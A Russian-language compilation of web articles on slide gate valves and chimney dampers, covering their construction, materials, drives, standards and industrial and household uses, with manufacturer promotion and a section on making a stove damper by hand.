Применение и конструктивные особенности задвижки шиберного типа

Шиберная задвижка: устройство и принцип действия, применение в отопительных и вентиляционных системах

Среди различной регулирующей аппаратуры технологических потоков жидкостей и газов самым распространённым видом являются шиберные задвижки. Шиберной такая арматура названа по рабочему органу, шиберу. Применяются несколько разновидностей таких запорных устройств, подразделяются они по характеру рабочего органа и виду приводного механизма.

Поток жидкости или газа движется в направляющей конструкции. Это может быть трубопровод, газопровод, воздуховод и подобные трубы. Для того чтобы прервать движение в потоке, необходимо перегородить проход.

Для этого и предназначены шиберные задвижки. Устанавливаются они только в разрыв в магистрали с вмонтированными в этом месте с двух сторон фланцевыми соединениями.

И шиберная задвижка принадлежит к виду межфланцевых регулирующих соединений.

Шиберные задвижки

Обратите внимание

Основным механизмом шиберной задвижки является нож, заслонка или шибер. Нож представляет стальную пластину со штоком, на который надевается привод, но может происходить и ручное регулирование.

При этом рабочий механизм движется по направляющим между двумя фланцами и прерывает поток.

При этом существуют системы уплотнения, сальники, обеспечивающие герметичность работы шиберной задвижки.

Другим регулирующим механизмом может быть поворотная заслонка, которая поворачивается на штыре, закреплённом по диаметру плоскости круглой пластины.

Другими деталями станут в зависимости от применения различные приводные устройства. При этом привод может быть:

  • ручным;
  • электрическим;
  • пневматическим;
  • механическим.

Иногда такие задвижки устанавливают под углом к потоку жидкости, это позволяет выполнять открытие с меньшими усилиями. Такое устройство легко ремонтируется, посадочные канавки очищаются от загрязнений.

Область применения шиберных задвижек

Регулирующая и запорная арматура используется при перекачивании пульпы, грязных сточных вод и в технологических процессах химического и целлюлозного производства.

На газовых магистралях и в системе воздуховодов также применяют устройства с шиберами различной конструкции.

Такие задвижки применяются для регулирования направленного потока пульпы или для пропускания агента в обе стороны.

При этом для разных целей применяются отличающиеся схемы регулирования.

  1. Одноножевая задвижка применяется в трубопроводах, работающих под давлением. При этом задвижка принимает усилие через шток, который может выдвигаться по мере открытия, а может быть невыдвижным. Открывание происходит за счёт неподвижной гайки, укреплённой в корпусе и штока с нарезанной резьбой.
  2. Двуножевые задвижки сложны и стоят намного дороже, применяются на газовых магистралях, работающих под большим давлением.

Применение такой запорной аппаратуры оправдано там, где давление в трубопроводе достигает меньше 40 бар и температура менее 400 градусов. Рабочий шибер изготавливается из материала, устойчивого к определённой рабочей среде.

Применение шиберов в отопительных системах

Если нагреватель, использует топливо и создаёт температуру рабочей среды, при горении с поступлением воздуха требуется отсекатель. В противном случае через каналы уйдёт нагретый воздух и помещение остынет.

Заслонка, установленная на печной трубе, является простейшей ручной шиберной задвижкой. Устанавливается заслонка так, чтобы отсечь выход горячего воздуха. Таким местом является печная труба в холодной части, под потолочным перекрытием.

Тогда весь нагретый воздух останется в помещении.

Однако, в этом случае шиберная задвижка служит и для регулирования расхода воздуха. Зная о том, что угли содержат жар, можно прикрыть воздух и тем самым продлить горение угля, добиваясь эффективной работы печи.

Важно

Но при активном процессе выделяется угарный газ, поэтому вытяжка из печи должна работать. Считается, что пока над углём есть синие язычки пламени, заслонку закрывать полностью нельзя.

Поэтому даже полностью закрытая заслонка по стандарту перекрывает условный проход дымохода на 85%.

Печные заслонки должны отвечать ряду требований. Так, они должны иметь:

  • гладкую поверхность;
  • не деформироваться при перепаде температуры;
  • быть лёгким в управлении.

Ещё не так давно считалось оптимальным применять для установки в трубу конструкцию шибера с пластиной из чугуна. Материал не деформируется, устойчив и лёгок в управлении.

Однако новые материалы оказались эффективнее.

Качественная нержавеющая сталь не создаёт гидравлического сопротивления и такую задвижку можно перевести на автоматическое управление в зависимости от температуры отходящих газов.

Шибер их нержавеющей стали может быть обычной заслонкой, а может иметь внутриканальный регулировочный узел с переводом его на управление с приводом. Чаще всего используется дроссельная заслонка.

Шиберные задвижки на вентиляционных системах

Вентилятор по принципу действия напоминает центробежный насос, только качает он не жидкость, а воздух. Поэтому задвижка на подаче воздуха в магистраль должна быть обязательно.

Установленная после улитки вентилятора шиберная задвижка может работать на открывание автоматически после запуска вентилятора и тогда она называется пусковой. Другим назначением шибера может стать регулирование потока воздуха.

Шибер для воздуховодов изготавливается из оцинкованной пластины и может устанавливаться перпендикулярно и под углом в 45 градусов.

Шиберные задвижки по своему рабочему органу не могут работать на системах с повышенным давлением жидкости или газа и на линиях, где основным требованием к арматуре является её полная герметичность.

Источник: http://pechi.guru/kladka-pechi/shibernye-zadvizhki-i-ih-ustroystvo.html

Шиберные задвижки

Название «шиберная задвижка» используют для параллельных задвижек, запирающий элемент которых выполнен в виде пластины. Про них также говорят «шиберный ножевой затвор», хотя «ГОСТ 24856-2014. Арматура трубопроводная. Термины и определения» делать этого не рекомендует.

Несмотря на то, что шиберная задвижка является параллельной, что называется, «по определению», в информационном пространстве можно встретить выражение «клиновая шиберная задвижка».

Прилагательное «шиберная» – производное от существительного «шибер». У слова «шибер» немецкая «родословная», оно происходит от глагола schieben ─ толкать, двигать, засовывать и т. д.

Совет

Если говорить об общетехническом универсальном значении термина «шибер» в русском языке, то это движущаяся пластина, служащая для перекрытия потока чего-либо. Например, шиберная задвижка для дымохода─ заслонка в дымоходах печей.

Шибером называют металлический лист, передвигаемый перпендикулярно оси воздуховода и служащий для регулирования потока воздуха путем уменьшения проходного отверстия вплоть до его полного перекрытия. Шиберы есть в котельных установках и водозаборных сооружениях.

Шибером называют устройство для периодического перекрытия нижней части установленного в мусоросборной камере ствола, служащего для погрузки твердых бытовых отходов в контейнеры.

В трубопроводной арматуре шибером, наряду с золотником, диском, клином, плунжером и др., называют подвижную часть затвора, имеющую вид пластины. Благодаря ее перемещению меняется пропускная способность арматуры и происходит открытие-закрытие проходного сечения.

В английском языке шиберная задвижка, затвор которой содержит шибер, называется slidegatevalve или slabgatevalve. Сам же шибер именуют по-разному ─ slab (англ. ─ плита, панель, кусок); knife (англ. ─ нож); slidinggate (англ. ─ откатной затвор); slidingplate (англ. ─ скользящая пластина).

Принцип работы и конструкция шиберных задвижек

Перемещающийся, как и «положено» для задвижек, перпендикулярно движению потока рабочей среды, шибер открывает и закрывает проходное отверстие. Усилие, которое создает привод задвижки шиберной, передается ему через шпиндель (шток).

Конструкция шиберной задвижки включает следующие основные узлы и детали: корпус, нож (шибер), стойку, уплотнительный элемент, сальниковый узел уплотнения.

Обратите внимание

Герметичность шиберной задвижки в закрытом состоянии обеспечивается прижатием ножа (шибера) к уплотнению под воздействием давления рабочей среды. Шиберные задвижки изготавливают с односторонней и двухсторонней герметичностью.

В их конструкции используют как выдвижной, так и невыдвижной шток. Второй вариант особенно популярен при дефиците пространства.

Корпус

Корпус шиберной задвижки, имеющий прямоугольную или цилиндрическую форму, выполняется цельным монолитным или сборным, сварным, например. Особенностью конструкции шиберной задвижки могут быть съемная нижняя крышка и сквозной нож (шибер).

Для изготовления корпусов шиберных задвижек используют серый или высокопрочный чугун с шаровидным графитом и различные стали ─ углеродистые, низколегированные, нержавеющие.

Материал шиберной задвижки не может не оказывать влияния на ее стойкость к агрессивным средам.

Задвижка чугунная шиберная несколько хуже стальной противостоит воздействию бензина, дизельного топлива, индустриального и моторного масел.

Возможен комбинированный вариант ─ корпус чугунный, а детали, контактирующие с агрессивной средой, сделаны из нержавеющей стали. Защиту корпуса от коррозии может обеспечивать эпоксидное покрытие.

Для корпусов используют не только черные металлы, но и цветные (алюминиевые сплавы) и даже неметаллические материалы. В ассортименте некоторых производителей представлена задвижка шиберная из ПВХ (поливинилхлорида).

Шибер (нож)

Шибер задвижки может иметь вид плиты, изготовленной из толстого проката, с параллельными уплотнительными поверхностями.

В плите сверлится отверстие, диаметр которого равен диаметру расположенных напротив патрубков, ─ это т. н. шибер с проходным отверстием.

Когда отверстие располагается ровно против патрубков, шиберная задвижка полностью открыта, а когда оно «уходит», ─ задвижка закрывается.

Важно

Шибер может иметь острую кромку, делающую его похожим на гильотину или нож. Следствием сходства шибера с ножом является название ─ «задвижка шиберная ножевая», а с гильотиной ─ «задвижка гильотинного типа».

Наличие скошенного полированного края позволяет шиберу, словно нож в масло, проникать в рабочую среду, обеспечивая быстрое перекрытие потока даже самых вязких, содержащих огромное количество механических включений, материалов.

Для ножей (шиберов) и шпинделей (штоков), как правило, используют нержавеющую сталь.

Нож полируют, гладкая поверхность обеспечивает свободное скольжение в местах контакта с уплотнительными материалами и позволяет избежать разного рода торможений и заклиниваний, что особенно актуально, когда рабочая среда содержит множество механических включений.

Уплотнения

Шиберные задвижки могут выполняться с уплотнением металл по металлу (металл/металл) или с применением более герметичных мягких уплотнений из синтетических материалов.

Нитриловая резина хорошо противостоит воздействию продуктов нефтехимии.

Как чрезвычайно надежное, зарекомендовало себя уплотнение на основе этиленпропилендиенового каучука. Российская аббревиатура СКЭПТ; международное обозначение EPDM.

Работоспособностью в контакте с маслами и топливом, в т. ч. в районах с холодным климатом, отличаются резиновые смеси на основе СКН.

Высокую герметичность даже при воздействии агрессивных жидкостей и высоких температур демонстрирует Viton.

В шиберных задвижках, используемых в пищевой и фармацевтической промышленности, применяют уплотнения, выполненные из силикона.

Благодаря сальнику обеспечивается герметичность верхней части шиберной задвижки. Для его набивки используют хлопчатобумажное волокно (промасленное и сухое), синтетические волокна, графитсодержащие материалы и др.

Способы управления шиберными задвижками

Шиберные задвижки могут быть оснащены различными видами управления: ручным или гидро-, пневмо-, электроприводом.

При относительно небольших номинальных диаметрах часто применяется ручной привод – задвижка шиберная ручная.

Это может быть маховик (штурвал) с выдвижным или невыдвижным штоком, рычаг или квадратная насадка для T-образного ключа. Маховик с цепью применяют при расположении задвижки в труднодоступном месте.

Совет

Рычаг используют при небольших значениях номинального диаметра (DN до 200-300). Редуктор ─ при достаточно больших значениях DN и PN.

Если необходимо управлять шиберными задвижками больших размеров, прибегают к помощи механизированного (автоматического) привода.

Используют пневматический привод одностороннего или двустороннего действия, в т. ч. с ручным дублером. Крайние положения ножа выставляются с помощью регулировочных болтов.

Шиберные задвижки с электроприводом для фиксации крайних положений ножа оснащены концевыми выключателями.

Присоединение к трубопроводу

Для шиберных задвижек используют следующие типы присоединения ─ фланцевый (задвижка шиберная фланцевая), межфланцевый (задвижка шиберная межфланцевая), под приварку.

При межфланцевом присоединении шиберная задвижка устанавливается между фланцами, приваренными к трубопроводу. Для фиксации задвижки используют болты или шпильки. Герметичность соединения обеспечивают с помощью межфланцевых прокладок.

Преимущества шиберных задвижек

Шиберные задвижки, составляющие заметную часть ассортимента многих производителей трубопроводной арматуры, обладают целым рядом преимуществ, наиболее значимые из которых приведены ниже в виде коротких тезисов.

  • Шиберные задвижки отличаются малой строительной длиной, например, по сравнению с кранами.
  • Устройство шиберной задвижки – относительно простое, что с одной стороны предопределяет легкость ее установки (скажем, возможность замены без врезания в трубопровод) и удобство эксплуатации, а с другой – надежность.
  • Показатели надежности в значительной степени зависят от параметров рабочей среды ─ ее агрессивности, температуры, концентрации механических примесей.
  • Шиберные задвижки ─ оборудование неприхотливое и не капризное, их обслуживание и ремонт не потребуют очень высокой квалификации персонала.
  • Шиберные задвижки от лучших производителей, использующих при их изготовлении качественные комплектующие и современные материалы, обладают такими важными свойствами как долговечность, стойкость к износу и воздействию агрессивных сред.
  • Срок службы шиберных задвижек может измеряться тремя и более десятилетиями, определяясь сроком службы корпуса. У других комплектующих он меньше, но также весьма внушителен. Например, у резинотехнических изделий – не менее 5 лет. Столько же составляет средний срок службы между капитальными ремонтами шиберной задвижки.
  • Отсутствие застойных зон и способность к самоочистке позволяют не задумываться о шлаках и грязи.
  • Важный параметр ─ минимальное гидравлическое сопротивление среды. Например, у шиберных задвижек производства компании АРМАТЭК коэффициент гидравлического сопротивления составляет не более 0,3 при полностью открытом ноже.
  • Шиберные задвижки обладают уникальными техническими возможностями, включая быстродействие и высокую герметичность. В т. ч. герметичность самого высокого класса А по «ГОСТ Р 54808-2011. Арматура трубопроводная. Нормы герметичности затворов».

 Технические параметры и широкий диапазон функциональных возможностей ─ исчерпывающий все потребности спектр размеров, значений давления и температуры ─ делают шиберные задвижки поистине универсальной трубопроводной арматурой, востребованной в самых разных областях технологий.

Применение шиберных задвижек

Особенности конструкции шиберных задвижек делают их присутствие особенно уместным в трубопроводных системах, обеспечивающих перемещение сложных рабочих сред. Например, сред, отличающихся высоким содержанием механических включений, обладающих повышенной вязкостью, пульпообразных (пульпа образуется при смешивании твердых частиц и жидкости) и даже сыпучих.

Перечень технологических процессов, для которых имеет принципиальное значение свойственное шиберным задвижкам умение управляться с абсолютно неприемлемыми для многих других разновидностей трубопроводной арматуры материалами, очень широк.

  • Горнодобывающая промышленность

Важнейший сегмент горной отрасли – обогащение полезных ископаемых. По мере истощения запасов рудного и нерудного сырья и снижения в его составе доли полезных компонентов, значение обогащения только увеличивается.

Шиберные задвижки широко используются в технологических установках обогатительных фабрик для обеспечения эффективности процессов транспортировки, промывки, химической обработки, дозирования сырья, классификации и подготовки пульп, отвода фильтрата и многих других операций.

  • Нефтегазодобывающая промышленность

Наряду с горнодобывающей отраслью становой хребет российской экономики составляет нефтегазовая промышленность.

Шиберные задвижки входят в состав фонтанной арматуры, используемой при добыче углеводородов.

Шиберные задвижки также устанавливают на магистральных нефтепроводах, где они служат гарантом немедленного перекрытия потока сырой нефти. Есть даже специальный нормативный документ ─ «ГОСТ 55020-2012.

Арматура трубопроводная. Задвижки шиберные для магистральных нефтепроводов. Общие технические условия».

  • Химическая промышленность

Шиберные задвижки монтируют на производственно-технологических линиях, обеспечивающих выпуск широкого спектра химической продукции – аммиака, ароматических углеводородов, жидкого стекла, мастик, минеральных удобрений, парафинов, растворителей, кислот и др.

  • Производство строительных материалов

Шиберными задвижками комплектуют установки для промывки песка, изготовления сыпучих и гранулированных материалов ─ гипса, доломита, извести, мела.

Шиберные задвижки широко используют в оборудовании для производства цемента.

  • Электроэнергетика и коммунальное хозяйство

Шиберные задвижки применяют в электроэнергетике, включая такой ответственный сегмент этой отрасли как атомная энергетика. В частности, шиберные задвижки производства компании АРМАТЭК поставлены на Ростовскую АЭС.

Шиберные задвижки устанавливают городские водоканалы на водопроводных и канализационных сетях. Они чрезвычайно эффективны при комплектации оборудования, обеспечивающего транспортировку производственных и коммунальных стоков к местам переработки.

Шиберные задвижки с успехом применяют в целом ряде не перечисленных выше отраслей ─ пищевой, целлюлозно-бумажной, деревообрабатывающей, металлургической, текстильной. А также в сельском хозяйстве, на очистных сооружениях и во многих иных направлениях технологий.

Обозначение шиберных задвижек

«ГОСТ 24856-2014. Арматура трубопроводная. Термины и определения» не рекомендует использовать вместо термина «номинальный диаметр» словосочетания с прилагательным «условный», как то ─ диаметр условного прохода, условный проход, условный диаметр.

Тем не менее, и сегодня все прекрасно понимают, что означает сочетание букв «Ду» в словах задвижка шиберная Ду100 (и далее Ду150, Ду200, Ду400, Ду500…).

Иногда «Ду» или в соответствии с ныне действующими нормативными документами ─ DN, опускают, говоря: задвижка шиберная (шиберная задвижка) 200 250, 300, 400, 1000.

Приложение Б (рекомендуемое) «Рекомендации по формированию наименования арматуры в документации» к вышеупомянутому ГОСТу рекомендует формировать наименование арматуры по следующей схеме: «тип арматуры ↔ вид арматуры ↔ конструктивная разновидность ↔ DN ↔ PN».

Обратите внимание

Многие производители трубопроводной арматуры используют собственный принцип построения наименования, стремясь сделать его максимально информативным. Например, для шиберных задвижек в компании АРМАТЭК используется следующий алгоритм:

«вид изделия ↔ присоединение к трубопроводу ↔тип исполнительного механизма ↔ номинальное давление рабочей среды ↔ условный проход ↔ климатическое исполнение ↔ конструкция уплотнения ↔ материал корпуса ↔ материал и конструкция шпинделя ↔материал ножа ↔ материал уплотнения».

Как не называй шиберную задвижку, одно очевидно ─ этот конструктивный вариант задвижек обладает большими без преувеличения уникальными возможностями, с успехом проявляя их в самых разных областях промышленности.

Источник: http://armatek.ru/about/truboprovodnaya_armatura/shibernye_zadvizhki/

Шиберная задвижка

Современные города имеют сложную систему трубопроводных коммуникаций, которая позволяет обеспечивать население водой и отводить отходы жизнедеятельности из жилых районов. Отведение канализационных стоков – важнейшая задача, от решения которой зависит здоровье и комфорт жителей.

Как правило, придомовые и городские канализационные сети (коллектора) являются самотечными, и запорная арматура на них не ставится.

Тем не менее стремительный рост городов и численности населения требует постоянного расширения и усложнения трубопроводных коммуникаций, которым необходим постоянный контроль.

Ранее для контроля сетей использовали фланцевые задвижки с металлическим клином, но они имеют ряд серьезных недостатков:

  • клин садится в гнездо, которое постоянно забивается грубым осадком;
  • внутренняя часть корпуса клиновых задвижек засоряются в процессе эксплуатации, что приводит к выходу из строя запорного элемента;
  • в верхних полостях корпуса может скапливаться метан – взрывоопасный газ;
  • рабочие элементы контактируют со средой и могут выходить из строя под воздействием мусора и мелких камней.

Согласно требованиям нового Свода Правил 32.13330.2012, пункт 6.1.4.

поясняет: «Напорные трубопроводы канализации следует проектировать с учетом характеристик транспортируемой сточной жидкости (агрессивности, повышенного содержания взвешенных частиц и т.п.).

Необходимо предусматривать дополнительные мероприятия и конструктивные решения, обеспечивающие оперативный ремонт или замену участков трубопроводов в процессе эксплуатации, а также применение незасоряющейся трубопроводной арматуры».

Клиновые задвижки под данные требования не подходят!

К незасоряющейся трубопроводной арматуре, подходящей для канализационных сетей, относятся шиберные задвижки. Они позволяют беспрепятственно контролировать поток жидкостей в канализационных сетях, благодаря специально разработанной конструкции.

Конструкция шиберной задвижки имеет ряд преимуществ:

  • чугунный плоский корпус имеет малую строительную длину, за счет чего задвижка более устойчива к истиранию и значительно экономит пространство в камере или колодце;
  • нижняя полость шиберной задвижки закрыта резиновым уплотнением, что исключает скопление в ней грубых осадков;
  • отсутствие полостей сверху, в которых может накапливаться метан — задвижка безопасна в обслуживании;
  • нержавеющий плоский нож при закрытии рубит пульпу, при открытии самоочищается;
  • шток, гайка и прочие управляющие элементы не взаимодействуют с транспортируемой средой и не подвержены воздействию стоков, просты в обслуживании и могут быть заменены без снятия задвижки с сети.

Дополнительные преимущества шиберных задвижек JAFAR арт 2005:

  • наличие диаметров до Ду1200;
  • возможность выбора выдвижного или невыдвижного шпинделя;
  • фланцевое уплотнение интегрировано в корпус;
  • управление штурвалом, штоком или электроприводом;
  • наличие модификации для бесколодезной установки;
  • возможность поставки модификации с корпусом из нержавеющей стали.

Благодаря своим техническим характеристикам и преимуществам шиберные задвижки JAFAR арт.2005 имеют обширную сферу применения:

  • канализационные насосные станции;
  • очистные сооружения;
  • напорные трубопроводы ливневой и бытовой канализации;
  • водозабор;
  • трубопроводы с технической водой и промышленными стоками;
  • трубопроводы для транспортирования сыпучих веществ.

При проектировании и монтаже шиберной задвижки необходимо помнить, что:

  • присоединение шиберной задвижки к трубопроводу межфланцевое, снизу задвижки болтовые отверстия проходные, а сверху тупиковые, поэтому монтаж трубопровода необходимо вести от шибера в обе стороны, а не к нему, чтобы избежать перекосов и напряжения в болтовых соединениях;
  • если под трубопровод не будет установлена опора, то корпус шибера будет испытывать растягивающее усилие, и из-под уплотнения возможны протечки или корпусом зажмет нож, вследствие чего управление будет невозможно;
  • шиберные задвижки нельзя применять на питьевом водоснабжении, так как нож выходит во внешнее пространство;
  • если предполагается, что шиберная задвижка будет работать в затопленном состоянии или под землей (бесколодезно), то необходимо применять специальную шиберную задвижку для бесколодезной установки JAFAR арт. 2006 с защищенным от засорения шпинделем.

На сегодняшний день канализационные насосные станции и очистные сооружения, построенные много десятилетий назад, требуют кардинальной реконструкции. Этим объектам и строящимся напорным сетям канализации требуется современная, качественная и соответствующая требованиям Свода Правил запорная арматура. Рациональным решением данных вопросов является качественных шиберных задвижек.

Надежные и качественные шиберные задвижки можно приобрести у дилеров компании «ЯФАР РУС»: https://jafar-rus.ru/dealers

Ассортимент шиберных задвижек JAFAR

2005 – Задвижка шиберная с двусторонним уплотнением: https://jafar-rus.ru/products/zadvizhka_shibernaja_2005/

2006 – Задвижка шиберная для бесколодезной установки: https://jafar-rus.ru/products/zadvizhka_dlya_podzemnoj_ustanovki_2006/

2905 – Задвижка шиберная с приводом: https://jafar-rus.ru/products/zadvizhka_shibernaja_2905/

Источник: https://jafar-rus.ru/news/articles/shibernaya-zadvizhka/

Задвижка шиберная: конструкция, характеристики и области применения

09.04.2016 20:34 | Категория: Загородный дом

Для начала следует сказать, что такое шиберная задвижка.

В частности, это трубопроводная запорная арматура, которая предназначена для контроля потока содержимого трубы.

По механическими типу шиберная задвижка может быть:

  • клина-затворной;
  • пластина-задвижной.

Такая задвижка традиционно считается проверенной и надежной системой.

Конструктивные и методические особенности

Что касается клинового шибера, он сконструирован таким образом, что затвор происходит по принципу обыкновенного клина. Перекрытие трубопровода выполняется параллельным путем.

Конструкция и методика перекрытия задвижной шиберной пластины немного иная. Работа основывается на движении пластины вверх при открывании и вниз при затворе, перпендикулярно трубопроводу.

Как в первом, так и во втором случае имеет место два варианта приведения шиберной задвижки в действие, это механический или ручной способ. При механическом затворе достаточно потянуть кран вверх и задвижка шиберная отодвигается. Ручной механизм основан на прокрутке крана. Поворот производится по стрелке часов и против нее, для управления шибером.

Области применения

Необходимо заметить, что задвижки по принципу шибера не обладают способностью герметичного перекрытия потока в трубопроводе. Чаще всего установка шиберной задвижки выполняется на первых метрах магистрали трубопровода. Объяснено это тем, что данный отрезок в основном мало утеплен.

Применяется такая задвижка для канализационных труб, в промышленности нефтепереработки, на целлюлозных фабриках, вентиляционных системах и естественно в химической промышленности. Наиболее часто применяемая, является шиберная задвижка с пластина-затворным механизмом, нежели клина подобным.

Характеристики

Для производства затворных шиберов выбирают лишь некоторые виды стали, такие как CF8, LC1, WCB, 904L и CF8M. По всем нормам допускается использование только таких разновидностей стального материала. Могут встречаться в продаже задвижки из другого материала, но в этом случает, гарантий на качество такого механизма быть не может.

Качественные задвижные шиберные установки способны прослужить долгий срок. Они достаточно просты в эксплуатации и небольшие по размеру. Так же, не вызывают проблем в техобслуживании и содержат широкий ассортиментный ряд. Это обусловлено популярностью применения в различных многих производственных областях.

Источник: http://stroibloger.com/zadvizhka-shibernaya-konstruktsiya-harakteristiki-i-oblasti-primeneniya/

Шиберная задвижка это просто: где и как применяется такой вид задвижек, шибер своими руками

Шиберная задвижка относится к трубопроводной арматуре. Отличие шиберной задвижки от обычной задвижки заключается в исполнении запорного элемента.

Шиберные задвижки с запорным элементом, который обычно выполняется в виде металлической пластины маленькой толщины, часто используется в вакуумной технике.

Причина этого кроется в возможности производства шиберной задвижки различных сечений при минимальной длине, к тому же в открытом положении задвижка не содержит никаких элементов, которые могут выступать внутрь трубы.

Важно

Поэтому такая задвижка будет создавать наименьшее сопротивление остаточным газам, что достаточно важно для эффективного создания большого уровня вакуума.

Шиберные задвижки применяют для регулирования потока, а также полного закрытия или открытия движения среды.

В быту шиберы можно встретить в конструкциях печного отопления. Там они имеют вид обыкновенной задвижки, предназначением которой служит регулирование тяги в дымоходе.

Для чего нужна шиберная задвижка

  1. Шиберная задвижка служит заслонкой регулятором, который дает возможность уменьшать диаметр дымоходного канала. Такая задвижка позволяет закрывать дымовой канал после того, как топка завершена. Когда в текущий момент, дымоход не используется, шиберная задвижка закрыта.

  2. Шибер также служит для регулирования тяги в дымоходе. Иначе говоря, является регулирующей задвижкой по ходу дыма. Она дает возможность изменять интенсивность тяги, увеличивая или уменьшая диаметр дымового канала.
  3. Шиберная задвижка регулирует процесс горения в топках печей, каминов и пр.

    Ее установка позволяет вести контроль за дымовыми газами и воздушными потоками в дымоходах печей, особенно тех, в которых особенности конструкции могут препятствовать регулировке процессов сгорания топлива.

Необходимо помнить, что шибер не монтируется в те конструкции, в которых горение в камере идет вследствие подачи приточного воздуха.

Устанавливают его, в большинстве случаев, на первых метрах трубы, потому что именно они зачастую остаются неутепленными.

Совет. Специалисты не рекомендуют монтировать шибер на те отрезки трубы, которые хорошо утеплены, потому что в момент термического расширения трубы они могут заклинить.

Материалы для изготовления шиберов

В основном, шиберы для печного отопления производят из стали. К преимуществам такого материала можно отнести:

  1. Хорошую теплопроводность;
  2. Стойкость к высоким температурам;
  3. Достаточные прочностные характеристики;
  4. Устойчивость к возникновению коррозии;
  5. Невысокий коэффициент по термическому расширению.

Иногда, шиберы изготавливают и из других металлов, но, чаще всего, они уступают по своим эксплуатационным характеристикам.

К примеру, чугунные шиберы обладают очень большим весом. Отсюда возникает сложность при их монтировании в готовые конструкции. Область их применения ограничивается кирпичными трубами.

Преимущества применения шиберов

Стандартная задвижка может перекрывать дымовой канал на 85%. Он является наилучшим для эффективного выведения угарных газов. Это особенно важно для таких помещений, как бани, потому что увеличивается уровень безопасности пребывания в них.

Кроме безопасности, применение шиберных задвижек, повышает эффективность использования топливных материалов, так как они лучше прогорают.

На данный момент, существует два основных вида шиберов, которые отличаются между собой определенными конструктивными особенностями. Это выдвижной шибер и поворотный, который иначе называют дроссельной заслонкой.

Выдвижной шибер. Он дает возможность регулировать процесс горения при помощи выдвижения пластины, так изменяется диаметр дымового канала. Такой вид наиболее часто монтируется в кирпичных дымоходах горизонтально. Есть и специальные модели для дымовых каналов, которые произведены из нержавеющей стали.

В пластине, которая перекрывает, сделаны отверстия (либо выпиливается сегмент). Это делается потому, что даже в полностью закрытом положении пластина не должна полностью перекрывать канал. Этого требуют строительные нормы и правила пожарной безопасности.

Такой вид характеризуется наибольшей надежностью.

Поворотный шибер. Он представляет из себя пластину, которая вращается вокруг собственной оси, открывая или же закрывая дымоходный канал. Изготавливается из гладкой пластины, которая разделяется осью пополам и фиксируется на ней. Регулировка производится при помощи поворота по кругу обоих частей шибера.

Менее надежный вид, по сравнению с первым. По причине существенного недостатка: при долговременной эксплуатации есть вероятность разрушения сварки, которая скрепляется пластину и ось. Применяется такой вид в конструкциях, где по каким-либо причинам нельзя использовать выдвижной шибер.

Выбор шибера

Встроить его можно в большинство видов печей и каминов. За исключением самых современных моделей, в них потоки воздуха регулируются при помощи дефлекторов.

Хоть и самым надежным считается выдвижной шибер, но и тут есть некоторые особенности, которые тоже требуется учесть при совершении выбора.

Когда задвижка устанавливается на газовую печь, то оптимальным выбором будет поворотный шибер. Его применение исключает вероятность полного перекрытия трубы и выброса пламени через зольник.

Совет

Выдвижная тоже может применяться, но необходим постоянный контроль, с целью недопущения уменьшения открытой площади сечения меньше 30%.

На печи в банях, также более эффективно ставить поворотные, потому что когда они закрыты, то не пропускают пара при поддаче. Но их очистка будет несколько сложнее, нежели у выдвижных.

Но проблема выбора шибера стоит только при самостоятельном сооружении печи или камина. В готовых — все уже учтено и идет в комплекте.

Самостоятельное изготовление задвижки

Перед изготовлением горизонтальной задвижки, предварительно точно замеряется сечение дымового канала и по нему точно вырезается фрагмент. Потом полученную пластину сваривают с двумя патрубками, в которых она будет располагаться после установки.

Изготовление поворотного шибера будет сложнее. Сначала сваривается рамка для заслонки. Для этого используются уголки с шириной полки порядка 35 миллиметров.

После высверливаются отверстия для оси. Когда необходим угловой шибер, отверстия делаются по диагонали. Когда шибер требуется прямой, то отверстия должны быть параллельными, посередине сваренной рамы.

После присоединяются втулки. Обязательно нужно проверить правильность их размещения. Ось должна без затруднений вращаться внутри.

Потом изготавливается непосредственно сама заслонка. Путем заготовки пластины по замерам сечения трубы.

Пластина вкладывается в рамку и приваривается к своей оси. При этом не должно возникнуть значительных зазоров, не более 1 миллиметра.

Обратите внимание

На следующем этапе, к заслонке необходимо приварить ограничитель, для ее полного закрытия.

После этого, на оси закрепляется ручка, при поворотах которой шибер будет осуществлять вращение.

Способы расположения шибера

Есть два самых распространенных:

  1. 1. Шибер, непосредственно встраиваемый в конструкцию (располагается в топке в виде отдельного элемента или же в выходном патрубке). В таком случае он устанавливается на первом метре, на том отрезке, который ближе к отопительному прибору. Так наиболее просто управлять задвижкой, потому что стержень ручки не будет задевать облицовку и портал. При монтаже таким способом, после выкладывания первого ряда кирпичей, переходят к непосредственной установке шибера. С этой целью, во втором ряду вырезается для нее фрагмент. При этом, необходимо учесть еще и место для раствора, на который будет производиться установка. В одном из кирпичей потребуется сделать сквозной паз, предназначенный для ручки. Второй ряд кирпича должен хорошо прилегать к предыдущему. Никаких щелей нельзя допускать. Далее идет остальная кладка.
  2. Когда шибер, который находится в дымоходном канале, соединяется с остальными элементами конструкции без дополнительного крепления. Его еще называют методом «труба в трубу».

При выборе способам установки, сначала необходимо учесть такие детали, как простота последующей очистки дымохода и вероятность его заклинивания.

Источник: https://kotel.guru/pechi/dymohody/chto-eto-takoe-shibernye-zadvizhki-i-gde-primenyayutsya-shibery.html

Шиберные затворы CMO с доставкой

Шиберные задвижки CMO — конструкция и особенности

Шиберные задвижки CMO представляют собой трубопроводную арматуру с запорным элементом в виде пластины, служащую для перекрытия потока жидкостей. Она находится в перпендикулярном к оси трубопровода положении и регулирует поток вещества или перекрывает его целиком благодаря сохранению проходного сечения открытым или закрытым. Другое название данных пластин – шибер.

Преимущества

К достоинствам задвижек производства CMO можно отнести:

  • Малую длину;
  • Простое строение, которое упрощает монтаж, эксплуатацию и обслуживание;
  • Отсутствие наличия особых профессиональных навыков техобслуживания;
  • Долговечность под воздействием даже самых агрессивных сред;
  • Длительный срок эксплуатации;
  • Отсутствие необходимости специальной чистки;
  • Высокая герметичность.

Данные задвижки находят применение на предприятиях горной, пищевой, целлюлозно-бумажной отраслей, в нефтепроводах, при перемещении химической продукции, промывке песка и других сыпучих материалов. Благодаря своим достоинствам шиберные задвижки применяются и при перемещении сложных веществ с механическими частицами.

Конструкция и компоненты

Конструкция задвижек шиберного типа состоит из следующих составляющих: корпус, непосредственно шибер, стойка, элемент уплотнения и сальниковый узел. Корпус задвижки изготавливают прямоугольной или цилиндрической формы. Он может быть цельным, сборным или сварным.

Отличительной чертой конструкции шиберно-ножевых задвижек можно считать отцепляющуюся нижнюю крышку или сквозной шибер. В качестве материала корпуса применяется чугун и разнообразные стали. В зависимости от агрессивности среды используют нержавеющую или легированную сталь, однако возможен и вариант комбинирования материалов.

